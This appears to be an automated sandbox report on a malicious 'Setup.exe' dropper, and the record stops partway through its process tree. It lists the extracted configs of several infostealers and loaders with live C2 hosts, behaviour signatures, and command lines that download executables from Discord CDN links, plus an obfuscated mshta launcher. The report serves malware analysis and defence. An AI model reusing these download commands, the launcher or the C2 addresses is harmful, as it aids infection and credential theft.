Analysis

  • max time kernel
    813s
  • max time network
    1162s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    01-11-2021 18:15

General

  • Target

    Setup.exe

  • Size

    403KB

  • MD5

    d1b2c8ddca2f8dd02e2c132153055084

  • SHA1

    21c011ac7406eef048c175f5887e4eb885c050d6

  • SHA256

    506c2f513d64242fcb20ccff8c26c0ed1755fe9120b984c29ba224b311d635c3

  • SHA512

    ab73df911df41235159341cc8fefed284a3f9720f241b51dfe2db2ac415b3438d5fbbeacfa980a61d402edc64afeda87447ccda49b7d279fba524036e9287594

Malware Config

Extracted

Family

xloader

Version

2.5

Campaign

s0iw

C2

http://www.kyiejenner.com/s0iw/

Decoy

ortopediamodelo.com

orimshirts.store

universecatholicweekly.info

yvettechan.com

sersaudavelsempre.online

face-booking.net

europeanretailgroup.com

umofan.com

roemahbajumuslim.online

joyrosecuisine.net

3dmaker.house

megdb.xyz

stereoshopie.info

gv5rm.com

tdc-trust.com

mcglobal.club

choral.works

onlineconsultantgroup.com

friscopaintandbody.com

midwestii.com

Extracted

Family

raccoon

Botnet

5043d5e3b118376f4c4ca4eae396c30af7ffb989

Attributes
  • url4cnc

    http://telegalive.top/dodgeneontwinturbo

    http://toptelete.top/dodgeneontwinturbo

    http://telegraf.top/dodgeneontwinturbo

    https://t.me/dodgeneontwinturbo

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

dsd1

C2

91.206.14.151:16764

Extracted

Family

redline

C2

185.215.113.51:56632

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

41.7

Botnet

937

C2

https://mas.to/@lenka51

Attributes
  • profile_id

    937

Extracted

Family

raccoon

Botnet

8dec62c1db2959619dca43e02fa46ad7bd606400

Attributes
  • url4cnc

    http://telegin.top/capibar

    http://ttmirror.top/capibar

    http://teletele.top/capibar

    http://telegalive.top/capibar

    http://toptelete.top/capibar

    http://telegraf.top/capibar

    https://t.me/capibar

rc4.plain
rc4.plain

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Xloader Payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 54 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 25 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1100
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:3040
      • C:\Users\Admin\AppData\Local\Temp\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
        2⤵
        • Checks computer location settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Users\Admin\Pictures\Adobe Films\T8rG_eIewC6NZYkRh4XDdttr.exe
          "C:\Users\Admin\Pictures\Adobe Films\T8rG_eIewC6NZYkRh4XDdttr.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2252
        • C:\Users\Admin\Pictures\Adobe Films\PTygEaTalL9C4BXKucgjeCHt.exe
          "C:\Users\Admin\Pictures\Adobe Films\PTygEaTalL9C4BXKucgjeCHt.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\C726.bat "C:\Users\Admin\Pictures\Adobe Films\PTygEaTalL9C4BXKucgjeCHt.exe""
            4⤵
              PID:3604
              • C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe
                C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                5⤵
                  PID:5080
                • C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe
                  C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
                  5⤵
                  • Executes dropped EXE
                  PID:3524
                • C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe
                  C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                  5⤵
                  • Executes dropped EXE
                  PID:6896
                • C:\Users\Admin\AppData\Local\Temp\30028\18.exe
                  18.exe
                  5⤵
                    PID:7104
                  • C:\Users\Admin\AppData\Local\Temp\30028\Transmissibility.exe
                    Transmissibility.exe
                    5⤵
                      PID:6920
                    • C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe
                      C:\Users\Admin\AppData\Local\Temp\C724.tmp\C725.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                      5⤵
                        PID:3228
                  • C:\Users\Admin\Pictures\Adobe Films\QFaMzMc7JCJyte0hTKH160fO.exe
                    "C:\Users\Admin\Pictures\Adobe Films\QFaMzMc7JCJyte0hTKH160fO.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:676
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\demimondaines.vbs"
                      4⤵
                        PID:2688
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\adorning.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq
                          5⤵
                          • Executes dropped EXE
                          PID:4540
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\lierne.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\lierne.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4232
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                              7⤵
                                PID:5716
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                7⤵
                                  PID:5732
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 1732
                                  7⤵
                                  • Program crash
                                  PID:5912
                        • C:\Users\Admin\Pictures\Adobe Films\6S8HDQyAKnykLmjUlIAmOmzz.exe
                          "C:\Users\Admin\Pictures\Adobe Films\6S8HDQyAKnykLmjUlIAmOmzz.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1112
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            #cmd
                            4⤵
                            • Checks processor information in registry
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4128
                        • C:\Users\Admin\Pictures\Adobe Films\l2eKgZRIUXUqL3rPglL5xcez.exe
                          "C:\Users\Admin\Pictures\Adobe Films\l2eKgZRIUXUqL3rPglL5xcez.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2548
                          • C:\Users\Admin\Pictures\Adobe Films\l2eKgZRIUXUqL3rPglL5xcez.exe
                            "C:\Users\Admin\Pictures\Adobe Films\l2eKgZRIUXUqL3rPglL5xcez.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:1816
                        • C:\Users\Admin\Pictures\Adobe Films\R7b_psutnZASbOnRznATAB_m.exe
                          "C:\Users\Admin\Pictures\Adobe Films\R7b_psutnZASbOnRznATAB_m.exe"
                          3⤵
                          • Executes dropped EXE
                          • Modifies system certificate store
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1348
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im chrome.exe
                            4⤵
                              PID:2504
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                5⤵
                                • Kills process with taskkill
                                PID:6580
                          • C:\Users\Admin\Pictures\Adobe Films\jatrYRu3HIEE7f8sMTKTogVG.exe
                            "C:\Users\Admin\Pictures\Adobe Films\jatrYRu3HIEE7f8sMTKTogVG.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1148
                          • C:\Users\Admin\Pictures\Adobe Films\WOckRKoBFGTT_gMx05G7DX2m.exe
                            "C:\Users\Admin\Pictures\Adobe Films\WOckRKoBFGTT_gMx05G7DX2m.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:2096
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 924
                              4⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:6136
                          • C:\Users\Admin\Pictures\Adobe Films\Yg4KZmIVRHoy10cSScANcidc.exe
                            "C:\Users\Admin\Pictures\Adobe Films\Yg4KZmIVRHoy10cSScANcidc.exe"
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:2996
                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:764
                            • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                              "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks whether UAC is enabled
                              • Drops file in Program Files directory
                              PID:1140
                          • C:\Users\Admin\Pictures\Adobe Films\BkOdIqPKPA0B4WTMOCAHrllp.exe
                            "C:\Users\Admin\Pictures\Adobe Films\BkOdIqPKPA0B4WTMOCAHrllp.exe"
                            3⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:960
                            • C:\Users\Admin\Documents\L2FPSinc_zoVeiV6z_mfp1ca.exe
                              "C:\Users\Admin\Documents\L2FPSinc_zoVeiV6z_mfp1ca.exe"
                              4⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:6000
                              • C:\Users\Admin\Pictures\Adobe Films\uWRQuYrQ4_z5pvtxUhyReoe4.exe
                                "C:\Users\Admin\Pictures\Adobe Films\uWRQuYrQ4_z5pvtxUhyReoe4.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:5340
                              • C:\Users\Admin\Pictures\Adobe Films\Y059V0dkpI_pK18kDRGZPWtS.exe
                                "C:\Users\Admin\Pictures\Adobe Films\Y059V0dkpI_pK18kDRGZPWtS.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:6352
                              • C:\Users\Admin\Pictures\Adobe Films\H9ekUbSF5GKG_nc7ezzpowGW.exe
                                "C:\Users\Admin\Pictures\Adobe Films\H9ekUbSF5GKG_nc7ezzpowGW.exe"
                                5⤵
                                  PID:3080
                                  • C:\Users\Admin\Pictures\Adobe Films\H9ekUbSF5GKG_nc7ezzpowGW.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\H9ekUbSF5GKG_nc7ezzpowGW.exe" -u
                                    6⤵
                                      PID:6996
                                  • C:\Users\Admin\Pictures\Adobe Films\3Xgp55pNivqbr_sKJgBzlPmC.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\3Xgp55pNivqbr_sKJgBzlPmC.exe"
                                    5⤵
                                      PID:6608
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c taskkill /f /im chrome.exe
                                        6⤵
                                          PID:6668
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /f /im chrome.exe
                                            7⤵
                                            • Kills process with taskkill
                                            PID:4864
                                      • C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe"
                                        5⤵
                                          PID:6596
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                            6⤵
                                              PID:4608
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\GafHtvnT_FrSFi24WC4sVQcT.exe" ) do taskkill -f -iM "%~NxM"
                                                7⤵
                                                  PID:4908
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:2212
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill -f -iM "GafHtvnT_FrSFi24WC4sVQcT.exe"
                                                    8⤵
                                                    • Kills process with taskkill
                                                    PID:6972
                                            • C:\Users\Admin\Pictures\Adobe Films\OhVxQYzNEyg3DBWNy3USN0n6.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\OhVxQYzNEyg3DBWNy3USN0n6.exe"
                                              5⤵
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:6588
                                            • C:\Users\Admin\Pictures\Adobe Films\hLTZjqzn97H4Hco0SP6awU1t.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\hLTZjqzn97H4Hco0SP6awU1t.exe"
                                              5⤵
                                                PID:6716
                                              • C:\Users\Admin\Pictures\Adobe Films\nzdZf6SnNa5VYSGRAYyoAeWM.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\nzdZf6SnNa5VYSGRAYyoAeWM.exe"
                                                5⤵
                                                • Loads dropped DLL
                                                PID:5464
                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                  6⤵
                                                  • Loads dropped DLL
                                                  • Adds Run key to start application
                                                  PID:5228
                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                    7⤵
                                                    • Checks computer location settings
                                                    • Loads dropped DLL
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:6744
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b0,0x1e8,0x7ffcd744dec0,0x7ffcd744ded0,0x7ffcd744dee0
                                                      8⤵
                                                        PID:188
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0x104,0x128,0x7ff63b569e70,0x7ff63b569e80,0x7ff63b569e90
                                                          9⤵
                                                            PID:2972
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2584 /prefetch:1
                                                          8⤵
                                                          • Checks computer location settings
                                                          PID:7932
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2388 /prefetch:1
                                                          8⤵
                                                          • Checks computer location settings
                                                          PID:7756
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=1996 /prefetch:8
                                                          8⤵
                                                            PID:7440
                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=1984 /prefetch:8
                                                            8⤵
                                                              PID:4844
                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1936 /prefetch:2
                                                              8⤵
                                                                PID:4636
                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=3184 /prefetch:8
                                                                8⤵
                                                                  PID:7088
                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:2
                                                                  8⤵
                                                                    PID:3208
                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=3572 /prefetch:8
                                                                    8⤵
                                                                      PID:6692
                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=3496 /prefetch:8
                                                                      8⤵
                                                                        PID:1040
                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=3544 /prefetch:8
                                                                        8⤵
                                                                          PID:6540
                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1904,16166264920148259999,11149138612758722675,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6744_885353140" --mojo-platform-channel-handle=2056 /prefetch:8
                                                                          8⤵
                                                                            PID:8152
                                                                    • C:\Users\Admin\Pictures\Adobe Films\Yuky_3deUan3H9rXRvsxKeRu.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\Yuky_3deUan3H9rXRvsxKeRu.exe"
                                                                      5⤵
                                                                        PID:3644
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-4IAL6.tmp\Yuky_3deUan3H9rXRvsxKeRu.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-4IAL6.tmp\Yuky_3deUan3H9rXRvsxKeRu.tmp" /SL5="$60352,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Yuky_3deUan3H9rXRvsxKeRu.exe"
                                                                          6⤵
                                                                          • Loads dropped DLL
                                                                          PID:5564
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-25K4V.tmp\DYbALA.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-25K4V.tmp\DYbALA.exe" /S /UID=2709
                                                                            7⤵
                                                                            • Drops file in Drivers directory
                                                                            • Adds Run key to start application
                                                                            • Drops file in Program Files directory
                                                                            PID:4700
                                                                            • C:\Program Files\MSBuild\ONEHMFDLRG\foldershare.exe
                                                                              "C:\Program Files\MSBuild\ONEHMFDLRG\foldershare.exe" /VERYSILENT
                                                                              8⤵
                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                              PID:7008
                                                                            • C:\Users\Admin\AppData\Local\Temp\f5-91ee7-3f5-352ae-45034c78abf0d\SHywasafave.exe
